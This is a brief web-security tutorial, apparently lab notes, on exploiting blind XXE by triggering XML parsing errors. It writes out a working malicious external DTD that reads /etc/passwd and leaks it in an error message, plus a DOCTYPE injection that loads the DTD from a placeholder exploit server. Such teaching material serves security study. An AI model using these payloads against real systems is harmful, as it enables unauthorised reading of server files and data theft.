Blind XXE to LFI

An alternative approach to exploit a Blind XXE is to trigger an XML parsing error.

  • Where the error message brings us the sensitive information, might be effective when it's shown in the application's response.

We can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

  • Creates an XML parameter entity called file, which contains /etc/passwd

  • Creates an XML parameter entity called eval, which dynamically contains another entity called error. Error entity will be evaluated by loading a non-existent file, whose name contains the value of the file entity

  • Uses eval entity, which causes the error entity to be performed

  • Uses error entity, so it attempts to load a non-existent file

Resulting in an error message containing the name of the non-existent file, and gives the contents of /etc/passwd.

Create a malicious XML entity and host it in your exploit server, save it

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Now insert an XML statement invoking the external DTD asusal

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://YOUR-EXPLOIT-DTD"> %xxe;]>

We can notice, we get a response giving us the contents of /etc/passwd

PreviousExploitationNextBlind XXE by defining Local DTD

Last updated